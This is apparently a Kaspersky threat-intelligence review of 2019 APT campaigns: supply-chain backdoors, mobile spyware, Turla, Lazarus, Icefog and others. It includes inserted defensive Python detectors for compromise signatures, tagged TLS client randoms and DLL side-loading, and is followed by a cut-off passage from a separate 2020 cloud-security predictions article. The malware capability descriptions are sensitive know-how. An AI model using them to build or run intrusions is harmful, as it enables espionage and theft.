Kaspersky Securelist

APT review: what the world’s threat actors got up to in 2019

4 December 2019 - 11:00

What were the most interesting developments in terms of APT activity during the year and what can we learn from them?

This is not an easy question to answer, because researchers have only partial visibility and it's impossible to fully understand the motivation for some attacks or the developments behind them. However, let's try to approach the problem from different angles in order to get a better understanding of what happened with the benefit of hindsight and perspective.

Compromising supply chains

Targeting supply chains has proved very successful for attackers in recent years – high-profile examples include ShadowPad, ExPetr and the backdooring of CCleaner. In our threat predictions for 2019, we flagged this as a likely continuing attack vector. We didn’t have to wait very long to see this prediction come true.

In January, we discovered a sophisticated supply-chain attack involving the update utility of a popular consumer hardware vendor, the mechanism used to deliver BIOS, UEFI and software updates to the vendor's laptops and desktops. The attackers behind Operation ShadowHammer added a backdoor to the utility and then distributed it to users through official channels. The goal of the attack was to target with precision an unknown pool of users, identified by their network adapter MAC addresses. The attackers hardcoded a list of MAC addresses into the Trojanized samples, representing the true targets of this massive operation. We were able to extract over 600 unique MAC addresses from more than 200 samples discovered in this attack, although it's possible that other samples exist that target different MAC addresses. You can read our reports on ShadowHammer here and here.


Q3 was interesting for APT developments in the Middle East, especially considering the multiple leaks of alleged Iranian activity that were published within just a few weeks of each other. Even more interesting is the possibility that one of the leaks may have been part of a disinformation campaign carried out with the help of the Sofacy/Hades actor.

In March, someone going by the handle Dookhtegan or Lab_dookhtegan started posting messages on Twitter using the hashtag #apt34. They shared several files via Telegram that supposedly belonged to the OilRig threat actor. These included logins and passwords of several alleged hacking victims, tools, details of infrastructure potentially related to different intrusions, the résumés of the alleged attackers and a list of web shells – apparently relating to the period 2014-18. The targeting and TTPs are consistent with the OilRig threat actor, but it was impossible to confirm the origins of the tools included in the dump. If the data in the dump is accurate, it would also show the global reach of the OilRig group, which most researchers had thought operates primarily in the Middle East.

On April 22, an entity going by the alias Bl4ck_B0X created a Telegram channel named GreenLeakers. The purpose of the channel, as stated by its creator, was to publish information about the members of the MuddyWater APT group, “along with information about their mother and spouse and etc.” for free. In addition to this free information, the Bl4ck_B0X actor(s) also hinted that they would put up for sale “highly confidential” information related to MuddyWater. On April 27, three screenshots were posted in the GreenLeakers Telegram channel containing alleged screenshots from a MuddyWater C2 server. On May 1, the channel was closed to the public and its status was changed to private. This was before Bl4ck_B0X had the chance to publish the promised information on the MuddyWater group. The reason for the closure is still unclear.

Finally, a website named Hidden Reality published leaks allegedly related to an entity named the Iranian RANA institute. It was the third leak in two months disclosing details of alleged Iranian threat actors and groups. Interestingly, this leak differed from the others by employing a website that allowed anyone to browse the leaked documents. It also relied on Telegram and Twitter profiles to post messages related to Iranian CNO capabilities. The Hidden Reality website contains internal documents, chat messages and other data related to the RANA institute’s CNO (computer network operations) capabilities, as well as information about victims. Previous leaks had focused more on tools, source code and individual actor profiles.

Close analysis of the materials, the infrastructure and the dedicated website used by the leakers provided clues that led us to believe that Sofacy/Hades may be connected to these leaks.

Lost in Translation and Dark Universe

The well-known Shadow Brokers leak, Lost in Translation, included an interesting Python script – sigs.py – that contained lots of functions to check if a system had already been compromised by another threat actor. Each check is implemented as a function that looks for a unique signature in the system – for example, a file with a unique name or registry path. Although some checks are empty, sigs.py lists 44 entries, many of them related to unknown APTs that have not yet been publicly described.
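The leaked sigs.py itself is not reproduced here. As an added example, written for this review and not taken from the leak or from Kaspersky, the script below shows the same structure in miniature: a table of check entries, each naming a file path or registry key whose presence would identify a particular intruder, and a runner that evaluates every entry and reports the hits. All signature names, paths and keys are constructed placeholders, not real indicators; the registry check uses the standard `winreg` module and only does anything on Windows. The check functions are injectable so the runner can be exercised without touching the host.

```python
import os
import sys
from dataclasses import dataclass
from typing import Callable, List


@dataclass(frozen=True)
class Signature:
    """One compromise check: a label plus the artefact whose presence identifies the intruder."""
    name: str       # label for the (hypothetical) toolkit the artefact belongs to
    kind: str       # "file" or "registry"
    location: str   # file path, or a registry key written as HIVE\Sub\Key


# Constructed sample entries; none of these paths or keys are real indicators.
SAMPLE_SIGNATURES: List[Signature] = [
    Signature("demo-toolkit-1", "file", r"C:\Windows\System32\demo_marker.dll"),
    Signature("demo-toolkit-2", "registry", r"HKLM\SOFTWARE\DemoVendor\Marker"),
    Signature("demo-toolkit-3", "file", "/var/tmp/.demo_marker"),
]


def file_present(path: str) -> bool:
    """A file-based signature fires when the path exists on disk."""
    return os.path.exists(path)


def registry_key_present(key_path: str) -> bool:
    """Open the key read-only; only meaningful on Windows, always False elsewhere."""
    if sys.platform != "win32":
        return False
    import winreg  # Windows-only module, imported lazily
    hives = {"HKLM": winreg.HKEY_LOCAL_MACHINE, "HKCU": winreg.HKEY_CURRENT_USER}
    hive_name, _, sub_key = key_path.partition("\\")
    try:
        with winreg.OpenKey(hives[hive_name], sub_key):
            return True
    except (OSError, KeyError):
        return False


def run_checks(signatures,
               file_check: Callable[[str], bool] = file_present,
               registry_check: Callable[[str], bool] = registry_key_present) -> List[str]:
    """Return the names of all signatures whose artefact is present.

    An entry with an empty location is skipped, mirroring the empty checks in sigs.py.
    """
    hits = []
    for sig in signatures:
        if not sig.location:
            continue
        check = file_check if sig.kind == "file" else registry_check
        if check(sig.location):
            hits.append(sig.name)
    return hits


if __name__ == "__main__":
    print(run_checks(SAMPLE_SIGNATURES))
```

On a clean host the sample table yields no hits. The point of the structure is that every check is cheap and independent, so a hunt across many unrelated artefacts costs little; the same layout suits a defender's own IoC sweep.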

In 2019, we identified the APT described as the 27th function of the sigs.py file, which we call DarkUniverse. We assess with medium confidence that DarkUniverse is connected with the ItaDuke set of activities due to unique code overlaps.

The main component is a rather simple DLL with only one exported function that implements persistence, malware integrity, communication with the C2 and control over other modules. We found about 20 victims in Western Asia and Northeastern Africa, including medical institutions, atomic energy bodies, military organizations and telecommunications companies.

Mobile attacks

Mobile implants are now a standard part of the toolset of many APT groups, and we have seen ample evidence of this during 2019.

In May, the FT reported that hackers had exploited a zero-day vulnerability in WhatsApp, enabling them to eavesdrop on users, read their encrypted chats, turn on the microphone and camera and install spyware that allows even further surveillance. To exploit the vulnerability, the attacker simply needed to call the victim via WhatsApp. This specially crafted call triggered a buffer overflow in WhatsApp, allowing the attacker to take control of the application and execute arbitrary code in it. The hackers apparently used this, not only to snoop on people’s chats and calls, but also to exploit previously unknown vulnerabilities in the operating system, which allowed them to install applications on the device. WhatsApp quickly released a patch for the exploit – and that seemed to be that. However, in October, the company filed a lawsuit accusing Israel-based NSO Group of having created the exploit. WhatsApp claims that the technology sold by NSO was used to target the mobile phones of more than 1,400 of its customers in 20 different countries, including human rights activists, journalists and others. NSO denies the allegations.

In July, we published a private report about the latest versions of FinSpy for Android and iOS, developed in mid-2018. The developers of FinSpy sell the software to government and law enforcement organizations all over the world, who use it to collect a variety of private user information on various platforms. The mobile implants are similar for iOS and Android. They are capable of collecting personal information such as contacts, messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers. The Android implant includes functionality to gain root privileges on an unrooted device by abusing known vulnerabilities. It seems that the iOS solution does not provide infection exploits for its customers, but is fine-tuned to clean traces of publicly available jailbreaking tools: this suggests that physical access to the victim’s device is required in cases where devices are not already jailbroken. The latest version includes multiple features that we have not observed before. During our recent research, we detected up-to-date versions of these implants in the wild in almost 20 countries, but the size of the customer base would suggest that the real number of victims could be much higher.

In August, Google’s Project Zero team published an extensive analysis of at least 14 iOS zero-days found in the wild and used in five exploitation chains to escalate privileges by an unknown threat actor. According to Google, the attackers used a number of ‘water-holed’ websites to deliver the exploits – possibly from as long as three years ago. While the blog contained no details about the compromised sites, or whether they were still active, Google claimed the websites had received “thousands of visitors per week”. The lack of victim discrimination points to a relatively non-targeted attack. However, the not-so-high estimate of the number of visitors to the water-holed sites, and the capabilities needed to deliver and install this malware, and keep the exploitation chains up-to-date for more than two years, shows a high level of resources and dedication.

In September, Zerodium, a zero-day brokerage firm, indicated that a zero-day for Android was now worth more than one for iOS – the company is now willing to pay $2.5 million for a zero-click Android zero-day with persistence. This is a significant increase on the company's previous payout ceiling of $2 million for remote iOS jailbreaks. By contrast, Zerodium has also reduced payouts for Apple one-click exploits. On the same day, someone found a high-severity zero-day in the v4l2 (Video4Linux) driver, the Android media driver. This vulnerability, which could enable privilege escalation, was not included in Google's September security update. A few days later, an Android flaw was identified that left more than a billion Samsung, Huawei, LG and Sony smartphones vulnerable to an attack that would allow an attacker to gain full access to emails on a compromised device using an SMS message. Whatever the relative value of Android and iOS exploits, it's clear that mobile exploits are a valuable commodity.

Established threat actors continue to revamp their tools

While investigating some malicious activity in Central Asia, we identified a new backdoor, named Tunnus, which we attribute to Turla. This is .NET-based malware with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the threat actor has built its C2 infrastructure with vulnerable WordPress installations.

This year, Turla also wrapped its notorious JavaScript KopiLuwak malware in a dropper called Topinambour, a new .NET file that the threat actor is using to distribute and drop KopiLuwak through infected installation packages for legitimate software programs such as VPNs. The malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer's registry for the malware to access when ready. The group uses two KopiLuwak analogues – the .NET RocketMan Trojan and the PowerShell MiamiBeach Trojan – for cyber-espionage; we believe Turla deploys these versions where their targets are protected with security software capable of detecting KopiLuwak.

We also observed a new COMpfun-related targeted campaign using new malware. The Kaspersky Threat Attribution Engine shows strong code similarities between the new family and the old COMpfun. Moreover, the attackers use the original COMpfun as a downloader in one of the spreading mechanisms. We named the newly identified modules Reductor after a .pdb path left in some of the samples. We believe the same COMpfun authors, who we tentatively associate with Turla based on victimology, developed this malware. One striking aspect of Reductor is that the threat actors put a lot of effort into manipulating installed digital root certificates and marking outbound TLS traffic with unique host-related identifiers. The malware adds embedded root certificates to the target host and allows operators to add additional ones remotely through a named pipe. The authors don't touch the network packets at all. Instead, they analyze Firefox source and Chrome binary code to patch the corresponding system pseudo-random number generation (PRNG) functions in the process's memory. Browsers use the PRNG to generate the 'client random' sequence at the very beginning of the TLS handshake. Reductor adds the victims' unique encrypted hardware- and software-based identifiers to this 'client random' field.
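Because Reductor never touches the packets, the only trace on the wire is the 32-byte client random itself. The following is an added example, written for this review and not Kaspersky's detection code, of how a network sensor can pull that field out of a ClientHello and score a batch of handshakes: a random that reappears in unrelated connections, or one whose bytes are far from uniform, is worth a second look. The ClientHello builder and the sample records it produces are constructed for the demo; the entropy floor of 3.5 bits per byte is an assumed tuning value.

```python
from collections import Counter
from math import log2


def build_client_hello(client_random: bytes) -> bytes:
    """Constructed minimal TLS 1.2 ClientHello record (one cipher suite, no extensions) for the demo."""
    if len(client_random) != 32:
        raise ValueError("client random must be 32 bytes")
    body = b"\x03\x03" + client_random + b"\x00"   # client_version, random, empty session_id
    body += b"\x00\x02\xc0\x2f"                     # one cipher suite
    body += b"\x01\x00"                             # one compression method (null)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body          # HandshakeType client_hello
    return b"\x16\x03\x01" + len(handshake).to_bytes(2, "big") + handshake  # record header


def extract_client_random(record: bytes) -> bytes:
    """Return the 32-byte random from a ClientHello carried in a single TLS handshake record."""
    if len(record) < 5 or record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    rec_len = int.from_bytes(record[3:5], "big")
    hs = record[5:5 + rec_len]
    if len(hs) < 4 or hs[0] != 0x01:
        raise ValueError("not a ClientHello")
    hs_len = int.from_bytes(hs[1:4], "big")
    body = hs[4:4 + hs_len]
    if len(body) < 34:
        raise ValueError("truncated ClientHello")
    return body[2:34]   # skip the 2-byte client_version


def byte_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; 32 distinct bytes give the maximum of 5.0 for a 32-byte field."""
    n = len(data)
    return -sum(c / n * log2(c / n) for c in Counter(data).values())


def find_suspicious_randoms(records, min_entropy: float = 3.5):
    """Return (repeated, low_entropy): hex randoms seen in more than one record,
    and randoms whose byte distribution falls below the entropy floor."""
    seen = Counter(extract_client_random(r) for r in records)
    repeated = sorted(r.hex() for r, count in seen.items() if count > 1)
    low_entropy = sorted(r.hex() for r in seen if byte_entropy(r) < min_entropy)
    return repeated, low_entropy


if __name__ == "__main__":
    # Constructed batch: two ordinary randoms, one identifier-like value sent twice, one patterned value.
    ident = bytes(range(100, 132))
    batch = [build_client_hello(x) for x in (bytes(range(32)), ident, bytes(range(32, 64)), ident,
                                              b"\x41" * 16 + b"\x42" * 16)]
    print(find_suspicious_randoms(batch))
```

Two caveats for anyone turning this into a rule. First, the page notes the identifiers are encrypted before insertion, so the entropy test alone will miss a well-made implant; repetition of the same random across distinct connections and destinations is the stronger signal. Second, a client legitimately resends the same random when it answers a TLS 1.3 HelloRetryRequest, so count repeats per connection, not per record, before alerting.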

Zebrocy has continued adding new tools to its arsenal using various kinds of programming languages. We found Zebrocy deploying a compiled Python script, which we call PythocyDbg, within a Southeast Asian foreign affairs organization. This module primarily provides for the stealthy collection of network proxy and communications debug capabilities. In early 2019, Zebrocy shifted its development efforts with the use of Nimrod/Nim, a programming language with syntax resembling both Pascal and Python that can be compiled down to JavaScript or C targets. Both the Nim downloaders that the group mainly uses for spear phishing, and other Nim backdoor code, are currently being produced by Zebrocy and delivered alongside updated compiled AutoIT scripts, Go, and Delphi modules. In September, Zebrocy spear-phished multiple NATO and alliance partners throughout Europe, attempting to gain access to email communications, credentials and sensitive documents. This campaign is similar to past Zebrocy activity, with target-relevant content used within emails, and ZIP attachments containing harmless documents alongside executables with altered icons and identical filenames. The group also makes use of remote Word templates pulling contents from the legitimate Dropbox file-sharing site. In this campaign, Zebrocy targeted defense and diplomatic targets located throughout Europe and Asia with its Go backdoor and Nimcy variants.

In June, we came across an unusual set of samples used to target diplomatic, government and military organizations in countries in South and Southeast Asia that we attribute to Platinum – one of the most technologically advanced APT actors. In this campaign, the attackers used an elaborate, previously unseen steganographic technique to conceal communication. A couple of years ago, we predicted that more and more APT and malware developers would use steganography, and this campaign provides proof. Interestingly, the attackers decided to implement the utilities they need as one huge set – an example of the framework-based architecture that is becoming more and more popular. Later in the year, we discovered Platinum using a new backdoor, which we call Titanium, in a new campaign. Interestingly, we found certain similarities between this malware and a toolset that we called ProjectC. We detected ProjectC in 2016 being used as a toolset for lateral movement and we attributed it with low confidence to CloudComputating. Our new findings lead us to believe that the CloudComputating set of activities can be attributed to Platinum and that ProjectC was one of its toolsets.

One of the key findings of our 2018 report on Operation AppleJeus was the ability of the Lazarus group to target Mac OS. Since then, Lazarus has expanded its operations for this platform. This year, we discovered a new operation, active for at least a year, which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers. Lazarus also targeted a mobile gaming company in South Korea that we believe was aimed at stealing application source code. It’s clear that Lazarus keeps updating its tools very quickly.

In Q3, we tracked new activity by BlueNoroff, a sub-group of Lazarus. In particular, we identified a bank in Myanmar that this threat actor compromised. We promptly contacted the bank to share the IoCs we had found. Our collaboration allowed us to obtain valuable information on how the attackers move laterally to access high-value hosts, such as those owned by the bank's system engineers interacting with SWIFT. They use a public login credential dumper and homemade PowerShell scripts for lateral movement. BlueNoroff also employs new malware with an uncommon structure, probably to slow down analysis. Depending on the command line parameters, this malware can run as a passive backdoor, an active backdoor or a tunneling tool; we believe the group runs this tool in different modes depending on the situation. Moreover, we found another type of PowerShell script used by this threat actor when it attacked a target in Turkey. This PowerShell script has similar functionality to those used previously, but BlueNoroff keeps changing it to evade detection.

Andariel, another sub-group of Lazarus, has traditionally focused on geo-political espionage and financial intelligence in South Korea. We observed new efforts by this actor to build a new C2 infrastructure targeting vulnerable Weblogic servers, in this case exploiting CVE-2017-10271. Following a successful breach, the attackers implanted malware signed with a legitimate signature belonging to a South Korean security software vendor. The malware is a brand new type of backdoor, called ApolloZeus, which is started by a shellcode wrapper with complex configuration data. This backdoor uses a relatively large shellcode in order to make analysis difficult. In addition, it implements a set of features to execute the final payload discreetly. The discovery of this malware allowed us to find several related samples, as well as documents used by the attackers to distribute it, providing us with a better understanding of the campaign.

In October, we reported a campaign that began when we stumbled upon a sample that uses interesting decoy documents and images containing a contact list of North Korean overseas residents. Almost all of the decoys contain content regarding the national holiday of the Korean Peninsula and the national day of North Korea. The lure content was also related to diplomatic issues or business relationships. Alongside the additional data from our telemetry, we believe that this campaign is aimed at targets with a relationship with North Korea, such as business people, diplomatic entities and human rights organizations. The actor behind this campaign used high-profile spear phishing and multi-stage infection in order to implant tailored Ghost RAT malware that can fully control the victim. We believe that the threat actor behind this campaign, which has been ongoing for more than three years, speaks Korean; and we believe that the DarkHotel APT group is behind it.

The Lamberts is a family of sophisticated attack tools used by one or multiple threat actors. The arsenal includes network-driven backdoors, several generations of modular backdoors, harvesting tools and wipers for carrying out destructive attacks. We created a colour scheme to distinguish the various tools and implants used against different victims around the world. More information about the Lamberts arsenal is available in our 'Unraveling the Lamberts Toolkit' report, available to our APT Intel customers. This year, we added several new colours to the Lamberts palette. The Silver Lambert, which appears to be the successor of Gray Lambert, is a full-fledged backdoor, implementing some specific NOBUS and OPSEC concepts such as protection from C2 sink-holing by checking the server SSL certificate hash, self-uninstall for orphaned instances (i.e. where the C2 is unavailable) and low-level file-wiping functionality. We observed victims of Silver Lambert in China, in the aeronautics sector. Violet Lambert, a modular backdoor that appears to have been developed and deployed in 2018, is designed to run on various versions of Windows – including Windows XP, as well as Vista and later versions of Windows. We observed victims of Violet Lambert in the Middle East. We also found other new Lamberts implants on computers belonging to a critical infrastructure victim in the Middle East. The first two we dubbed Cyan Lambert (including Light and Pro versions). The third, which we called Magenta Lambert, reuses older Lamberts code and has multiple similarities with the Green, Black and White Lamberts. This malware listens on the network, waiting for a magic ping, and then executes a very well-hidden payload that we have been unable to decrypt. All the infected computers went offline shortly after our discovery.

Early in the year, we monitored a campaign by the LuckyMouse threat actor that had been targeting Vietnamese government and diplomatic entities abroad since at least April 2018. We believe that this activity, which we call SpoiledLegacy, is the successor to the IronTiger campaign because of the similar tools and techniques it uses. The SpoiledLegacy operators use penetration-testing frameworks such as Cobalt Strike and Metasploit. While we believe that they exploit network service vulnerabilities as their main initial infection vector, we have also observed executables prepared for use in spear-phishing messages containing decoy documents, showing the operator's flexibility. Besides pen-testing frameworks, the operators use the NetBot downloader and Earthworm SOCKS tunneler. The attackers also include HTran TCP proxy source code into the malware, to redirect traffic. Some NetBot configuration data contains LAN IPs, indicating that it downloads the next stage from another infected host in the local network. Based on our telemetry, we believe that internal database servers are among the targets, as in a previous LuckyMouse Mongolian campaign. As the last stage, the attackers use different in-memory 32- and 64-bit Trojans injected into system process memory. Interestingly, all the tools in the infection chain dynamically obfuscate Win32 API calls using leaked HackingTeam code. From the start of 2019, we observed a spike in LuckyMouse activity, both in Central Asia and in the Middle East. For these new campaigns, the attackers seem to focus on telecommunications operators, universities and governments. The infection vectors are direct compromise, spear phishing and, possibly, watering holes. Despite different open-source publications discussing this actor's TTPs during the last year, LuckyMouse hasn't changed any of them. The threat actor still relies on its own tools to get a foothold in the victim's network, which in the new campaigns consists of using HTTPBrowser as a first stager, followed by the Soldier Trojan as a second stage implant. The group made a change to its infrastructure, as it seems to rely uniquely on IPv4 addresses instead of domain names for its C2s, which we see as an attempt to limit correlation.

The HoneyMyte APT has been active for several years. The group has adopted different techniques to perform its attacks over the past couple of years, and has targeted governments in Myanmar, Mongolia, Ethiopia, Vietnam and Bangladesh, along with remote foreign embassies located in Pakistan, South Korea, the US, the UK, Belgium, Nepal, Australia and Singapore. This year, the group has targeted government organizations related to natural resource management in Myanmar and a major continental African organization, suggesting that one of the main motivations of HoneyMyte is gathering geopolitical and economic intelligence. While the group targeted a military organization in Bangladesh, it’s possible that the individual targets were related to geo-political activity in the region.

The Icefog threat actor, which we have been tracking since 2011, has consistently targeted government institutions, military contractors, maritime and shipbuilding organizations, telecom operators, satellite operators, industrial and high technology companies, and mass media located mainly in Korea, Japan and Central Asia. Following our original report on Icefog in 2013, the group's operational tempo slowed and we detected a very low number of active infections. We observed a slight increase in 2016; then, beginning in 2018, Icefog began conducting large waves of attacks against government institutions and military contractors in Central Asia, which are strategically important to China's Belt and Road Initiative. In the latest wave of attacks, the infection began with a spear-phishing email containing a malicious document that exploits a known vulnerability and ultimately deploys a payload. From 2018 to the beginning of 2019, the final payload was the typical Icefog backdoor. Since May 2019, the actors appear to have switched and are now using Poison Ivy as their main backdoor. The Poison Ivy payload is dropped as a malicious DLL and is loaded using a signed legitimate program, using a technique called load order hijacking. This technique is very common with many actors and it was also used in previous Icefog campaigns. During our investigation, we were also able to detect artefacts used in the actor's lateral movement. We observed the use of a public TCP scanner downloaded from GitHub, a Mimikatz variant to dump credentials from system memory, a customized keylogger to steal sensitive information, and a newer version of another backdoor named Quarian. The Quarian backdoor was used to create tunnels inside the victim infrastructure in an attempt to avoid network detections. The functionality of Quarian includes the ability to manipulate the remote file system, get information about the victim, steal saved passwords, download or upload arbitrary files, create tunnels using port forwarding, execute arbitrary commands, and start a reverse shell.
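Load order hijacking of the kind Icefog uses leaves a recognisable trace in image-load telemetry: a signed executable pulls in a DLL that carries the name of a system library but lives in the application's own directory, not under System32, and is not validly signed. The script below is an added example for this review, not Kaspersky's or Icefog's code, that applies exactly that test to Sysmon Event ID 7 (ImageLoaded) records. The records are constructed for the demo and flattened to `key=value` pairs; the field names (`Image`, `ImageLoaded`, `Signed`, `SignatureStatus`, `Signature`) follow Sysmon's schema, while every path, vendor and value is invented. The DLL watch list is likewise a constructed placeholder.

```python
import ntpath

# Constructed Sysmon Event ID 7 (ImageLoaded) records flattened to key=value pairs.
# Field names follow Sysmon's schema; every path, vendor and value is invented for this demo.
SAMPLE_EVENTS = [
    "Image=C:\\Program Files\\DemoVendor\\updater.exe|ImageLoaded=C:\\Windows\\System32\\version.dll"
    "|Signed=true|SignatureStatus=Valid|Signature=Microsoft Windows",
    "Image=C:\\Users\\Public\\tools\\signedtool.exe|ImageLoaded=C:\\Users\\Public\\tools\\version.dll"
    "|Signed=false|SignatureStatus=Unavailable|Signature=",
    "Image=C:\\Program Files\\DemoVendor\\updater.exe|ImageLoaded=C:\\Program Files\\DemoVendor\\helper.dll"
    "|Signed=true|SignatureStatus=Valid|Signature=DemoVendor Ltd",
]

# Names of system DLLs that applications commonly resolve by name (constructed watch list).
SYSTEM_DLL_NAMES = {"version.dll", "dwmapi.dll", "msimg32.dll", "cryptbase.dll"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def parse_event(line: str) -> dict:
    """Split one flattened record into a field dictionary (empty values are kept)."""
    return dict(field.split("=", 1) for field in line.split("|"))


def is_sideload_candidate(event: dict) -> bool:
    """True when a DLL bearing a system DLL's name is loaded from the loading
    executable's own directory, outside the system directories, without a valid signature."""
    image, loaded = event["Image"], event["ImageLoaded"]
    same_dir = ntpath.dirname(loaded).lower() == ntpath.dirname(image).lower()
    in_system_dir = loaded.lower().startswith(SYSTEM_DIRS)
    validly_signed = (event.get("Signed", "").lower() == "true"
                      and event.get("SignatureStatus") == "Valid")
    return (ntpath.basename(loaded).lower() in SYSTEM_DLL_NAMES
            and same_dir and not in_system_dir and not validly_signed)


def find_sideloads(lines) -> list:
    """Return the ImageLoaded paths of every record that looks like a side-loaded DLL."""
    return [e["ImageLoaded"] for e in map(parse_event, lines) if is_sideload_candidate(e)]


if __name__ == "__main__":
    for path in find_sideloads(SAMPLE_EVENTS):
        print("possible DLL side-load:", path)
```

The signature test is a filter, not proof: the Andariel case above shows an implant carrying a legitimate vendor's signature, so a DLL that passes this check can still be hostile. In practice the rule is paired with a hash baseline of the application directory and an alert on a publisher mismatch between the loading executable and the DLL.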

Evolution of the ‘newcomers’

We first discussed ShaggyPanther, a previously unseen malware and intrusion set targeting Taiwan and Malaysia, in a private report in January 2018. Related activities date back to more than a decade ago, with similar code maintaining compilation timestamps from 2004. Since then, ShaggyPanther activity has been detected in several more locations: most recently in Indonesia in July, and – somewhat surprisingly – in Syria in March. The newer 2018 and 2019 backdoor code maintains a new layer of obfuscation and no longer maintains clear-text C2 strings. Since our original release, we have identified an initial server-side infection vector from this actor, using SinoChopper/ChinaChopper, a commonly used web shell shared by multiple Chinese-speaking actors. SinoChopper not only performs host identification and backdoor delivery but also email archive theft and additional activity. Although not all incidents can be traced back to server-side exploitation, we did detect a couple of cases and obtained information about their staged install process. In 2019, we observed ShaggyPanther targeting Windows servers.

In April, we published our report on TajMahal, a previously unknown APT framework that has been active for the last five years. This is a highly sophisticated spyware framework that includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, document and cryptography key stealers, and even its own file indexer for the victim's computer. We discovered up to 80 malicious modules stored in its encrypted Virtual File System – one of the highest numbers of plugins we have ever seen in an APT toolset. The malware features its own indexer, emergency C2s, the ability to steal specific files from external drives when they become available again, and much more. There are two different packages, self-named Tokyo and Yokohama, and the targeted computers we found include both packages. We think the attackers used Tokyo as the first stage infection, deploying the fully functional Yokohama package on interesting victims, and then leaving Tokyo in place for backup purposes. Our telemetry revealed just a single victim, a diplomatic body from a country in Central Asia. This begs the question, why go to all that trouble for just one victim? We think there may be other victims that we haven't found yet. This theory is supported by the fact that we couldn't see how one of the files in the VFS was used by the malware, opening the door to the possibility of additional versions of the malware that have yet to be detected.

In February, our AEP (Automatic Exploit Prevention) systems detected an attempt to exploit a vulnerability in Windows – the fourth consecutive exploited Local Privilege Escalation vulnerability in Windows that we had discovered in the preceding months. Further analysis led us to uncover a zero-day vulnerability in win32k.sys. Microsoft patched this vulnerability, CVE-2019-0797, on March 12, crediting Kaspersky researchers Vasiliy Berdnikov and Boris Larin with the discovery. We think that several threat actors, including FruityArmor and SandCat, used this exploit. FruityArmor had used zero-days before, while SandCat is a new APT actor that we discovered not long before. Interestingly, FruityArmor and SandCat seem to follow parallel paths, both having the same exploits available at the same time. This seems to point to a third party providing both groups with such artefacts.

During February 2019, we observed a highly targeted attack in the southern part of Russia using a previously unknown malware that we call Cloudmid. This spy program spread via email and masqueraded as the VPN client of a well-known Russian security company that, among other things, provides solutions to protect networks. So far, we have been unable to relate this activity to any known actor. The malware itself is a simplistic document stealer. However, given its victimology and the targeted nature of the attack, we considered it relevant enough to monitor, even though we were unable to attribute this set of activities to any known actor. The low OPSEC and simplistic malware involved in this operation does not seem to point to an advanced threat actor.

In February, we identified a campaign targeting military organizations in India that we were unable to attribute to any known threat actor. The attackers rely on watering holes and spear phishing to infect their victims. Specifically, they were able to compromise the Centre for Land Warfare Studies (CLAWS) website, using it to host a malicious document used to distribute a variant of the Netwire RAT. We also found evidence of a compromised welfare club for military personnel distributing the same malware during the same period.

In Q3, we observed a campaign utilizing a piece of malware referred to by FireEye as DADJOKE. This malware was first used in the wild in January 2019 and subsequently underwent constant development. We have only seen this malware used in a small number of active campaigns since January, all targeting government, military and diplomatic entities in the Southeast Asia region. The latest campaign, conducted in August, seems to have targeted only a select few individuals working for a military organization.

Privacy matters

On January 17, security researcher Troy Hunt reported a leak of more than 773 million email and 21 million unique password records. The data, dubbed Collection #1, were originally shared on the popular cloud service MEGA. Collection #1 is just a small part of a bigger leak of about 1 TB of data, split into seven parts and distributed through a data-trading forum. The full package is a collection of credentials leaked from different sources during the past few years, the most recent being from 2017, so we were unable to identify any more recent data in this ‘new’ leak. It turned out that Collection #1 was just part of a larger dump of leaked credentials comprising 2.2 billion stolen account records. The new data dump, dubbed Collection #2-5, was discovered by researchers at the Hasso Plattner Institute in Potsdam.

In February, further data dumps occurred. Details of 617 million accounts, stolen from 16 hacked companies, were put up for sale on Dream Market, accessible via the Tor network. The hacked companies include Dubsmash, MyFitnessPal, Armor Games and CoffeeMeetsBagel. Subsequently, data from a further eight hacked companies was posted to the same market place. Then in March, the hacker behind the earlier data dumps posted stolen data from a further six companies.

Stolen credentials, along with other personal information harvested from data leaks, are valuable not only to cybercriminals but also to targeted attackers, including those wishing to track the activities of dissidents and activists in various parts of the world.

We’ve become used to a steady stream of reports in the news about leaks of email addresses and passwords. The theft of such ‘traditional’ forms of authentication is bad enough, but the effects of using alternative methods of authentication can be much more serious. In August, two Israeli researchers discovered fingerprints, facial recognition data and other personal information from the Suprema Biostar 2 biometric access control system in a publicly accessible database. The exposure of biometric data is of particular concern. A compromised password can be changed, but a biometric characteristic is for life.

Moreover, the more widespread use of smart devices in new areas of our lives opens up a bigger pool of data for attackers. Consider, for example, the potential impact of smart speakers for listening in on unguarded conversations in the home. Social media giants are sitting on a growing pile of personal information – information that would prove very valuable to criminals and APT threat actors alike.

Final thoughts

We will continue to track all the APT activity we can find and will regularly highlight the more interesting findings, but if you want to know more, please reach out to us at intelreports@kasperksy.com

Corporate security prediction 2020

3 December, 2019 - 11:00

Moving to the cloud

The popularity of cloud services is growing, and threat actors are here to exploit the trend.

We are observing more and more cases where our customers’ infrastructure is partially or entirely located in the cloud – cloud migration has been the dominant trend of the past couple of years. This is resulting in a blurring of infrastructure boundaries. In 2020, we expect the following trends to emerge.

  • It will become more difficult for attackers to separate the resources of the targeted company from those of cloud providers. At the same time, it will be much more difficult for companies to detect an attack on their resources in the initial stages.

The transition to the cloud has blurred the boundaries of company infrastructures. As a result, it is becoming very difficult to target an organization’s resources in a precise manner. So, conducting an attack will become harder and the actions of threat actors will become more sophisticated or more frequent – relying on chance rather than planning. On the other hand, it will also be difficult for a company to identify targeted attacks at an early stage and separate them from the overall mass of attacks on the ISP.

  • Investigating incidents will become more complex and in some cases less effective.

Those who plan to deploy cloud infrastructure in 2020 need to talk in advance with their provider about a communications plan in the event of an incident, because time is of the essence when it comes to security incidents. It’s very important to discuss what data is logged, and how to back it up. Lack of clarity on such information can lead to complications or even make successful incident investigation impossible. We note, however, that awareness of cloud infrastructure security is not growing as fast as the popularity of cloud services, so we expect to see an increase in the complexities of investigating incidents as well as a decrease in the effectiveness of incident response.

